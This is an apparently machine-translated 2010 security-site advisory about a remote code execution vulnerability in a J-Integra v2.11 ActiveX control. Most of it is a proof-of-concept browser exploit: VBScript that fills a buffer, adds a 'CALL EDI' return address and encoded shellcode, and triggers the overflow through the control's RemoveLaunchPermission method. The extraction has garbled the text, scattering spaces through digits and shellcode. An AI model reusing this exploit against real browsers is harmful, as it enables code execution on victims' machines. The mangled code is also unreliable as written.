J-Integra v2. 1 1 remote code execution vulnerability-vulnerability warning-the black bar safety net

2010-12-03T00:00:00
ID MYHACK58:62201028478
Type myhack58
Reporter 佚名
Modified 2010-12-03T00:00:00

Description

J-Integra is a powerful, enables Java and COM, and J2EE, and. NET compatible middleware. J-Integra is divided into J-Integra for COM, J-Integra for . NET and J-Integra for Exchange of three partial products. J-Integra v2. 1 1 A control in the presence of a remote code execution vulnerability that could be exploited by attackers to initiate a Web hang horse attacks.

[+]info: ~~~~~~~~~ j-integra v2. 1 1 Remote code execution vulnerability Discovered on: Thursday, October 2 8, 2 0 1 0, 1 0:1 0:1 2 PM Download: http://j-integra.intrinsyc.com/ Author: bz1p, bz1p@bshellz.net impact: LOW, due to the object NOT marked safe for scripting Tested on: XP SP3 IE7 CVE: ? (0day)

[+]poc: ~~~~~~~~~

view source

print?

| 0 1 | <html> ---|---

0 2 | ---|---

0 3 | &lt;objectclassid='clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C" id=the'target"></object> ` ---|---

0 4 | &lt;scriptlanguage='vbscript"&gt; ---|---

0 5 | esp = String(1 0 0, "B") ---|---

0 6 | ---|---

0 7 | calc = unescape("%eb%0 3% 5 9%eb%0 5%e8%f8%ff%ff%ff%4 9%4 9%4 9%4 9%4 8%4 9") & _ ---|---

0 8 | unescape("%4 9%4 9%4 9%4 9%4 9%4 9%4 9%4 9%4 9%4 9%4 9%4 9%5 1%5a%6a%6 8") & _ ---|---

0 9 | unescape("%5 8%5 0%3 0%4 2%3 1%4 2%4 1%6b%4 1%4 1%7 8%3 2%4 1%4 2%3 2%4 2") & _ ---|---

1 0 | unescape("%4 1%3 0%4 2%4 1%4 1%5 8%3 8%4 1%4 2%5 0%7 5%5 9%7 9%3 9%6c%4a") & _ ---|---

1 1 | unescape("%4 8%5 0%4 4%6 3%3 0%3 5%5 0%4 3%3 0%4c%4b%5 7% 3 5% 7 7%4c%4c") & _ ---|---

1 2 | unescape("%4b%5 1%6c%3 5%5 5%6 4%3 8%7 7%7 1%6a%4f%4c%4b%6 2%6f%4 5") & _ ---|---

1 3 | unescape("%4 8%4e%6b%3 1%4f%4 5% 7 0% 5 5% 5 1%6a%4b%7 3% 7 9%6e%6b%7 0") & _ ---|---

1 4 | unescape("%3 4%6c%4b%4 6% 6 1%7a%4e%7 0% 3 1%4b%7 0%4e%7 9%6e%4c%6c") & _ ---|---

1 5 | unescape("%4 4%4 9%5 0%5 2%5 4%6 7%7 7%5a%6 1% 5 9%5a%3 4%4d%5 5% 5 1%6f") & _ ---|---

1 6 | unescape("%3 2%4a%4b%7 9% 6 4% 3 7%4b%5 1%4 4%4 1%3 4%3 5%5 4%7 1%6 5%6d") & _ ---|---

1 7 | unescape("%3 5%4e%6b%5 3%6f%4 7% 5 4% 6 5% 5 1%4a%4b%3 1% 7 6%4e%6b%4 6") & _ ---|---

1 8 | unescape("%6c%3 0%4b%6e%6b%5 1%4f%7 5%4c%5 4% 4 1% 5 8%6b%4c%4b%7 7") & _ ---|---

1 9 | unescape("%6c%6e%6b%6 6% 6 1% 5 8%6b%6d%5 9% 3 3%6c%4 6% 4 4% 4 6% 6 4%6a") & _ ---|---

2 0 | unescape("%6 3% 3 5% 6 1%6b%7 0% 7 1% 7 4%6e%6b%6 3% 7 0% 5 4% 7 0%6f%7 5%6f") & _ ---|---

2 1 | unescape("%3 0%5 4%3 8%5 6%6c%4c%4b%6 1% 5 0% 3 6%6c%4e%6b%3 4%3 0%3 5") & _ ---|---

2 2 | unescape("%4c%4c%6d%6e%6b%4 3%5 8%7 5%5 8%5 8%6b%5 4% 4 9%4c%4b%4d") & _ ---|---

2 3 | unescape("%5 0%6c%7 0%4 3%3 0%5 7%7 0%5 5%5 0%6e%6b%3 2% 4 8% 3 5%6c%7 1") & _ ---|---

2 4 | unescape("%4f%6 7% 4 1%6b%4 6%5 3%5 0%5 6%3 6%6b%3 9% 4 8% 7 8%4d%5 3%4f") & _ ---|---

2 5 | unescape("%3 0% 7 1%6b%3 2% 7 0% 3 3% 5 8%4c%3 0%4d%5a%5 6% 6 4% 4 3%6f%5 2") & _ ---|---

2 6 | unescape("%4 8%6a%3 8%4b%4e%4c%4a%6 6%6e%3 1% 4 7%4b%4f%6b%5 7% 6 1") & _ ---|---

2 7 | unescape("%7 3%7 0%6 1%3 0%6c%7 1% 7 3% 6 4%6e%7 0%6 5%7 3%4 8%7 2%4 5%3 5") & _ ---|---

2 8 | unescape("%5 0% 6 8") ---|---

2 9 | ---|---

3 0 | eip = unescape("%2f%5 5% 0 2% 1 0") ' CALL EDI ---|---

3 1 | arg1=String(2 5 3, "A") ---|---

3 2 | arg1 = arg1 + eip + esp + calc ---|---

3 3 | arg2="defaultV" ---|---

3 4 | ---|---

3 5 | the target. RemoveLaunchPermission arg1 ,arg2 ---|---

3 6 | &lt;/script&gt; ---|---

3 7 | &lt;/html&gt; ---|---

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/15648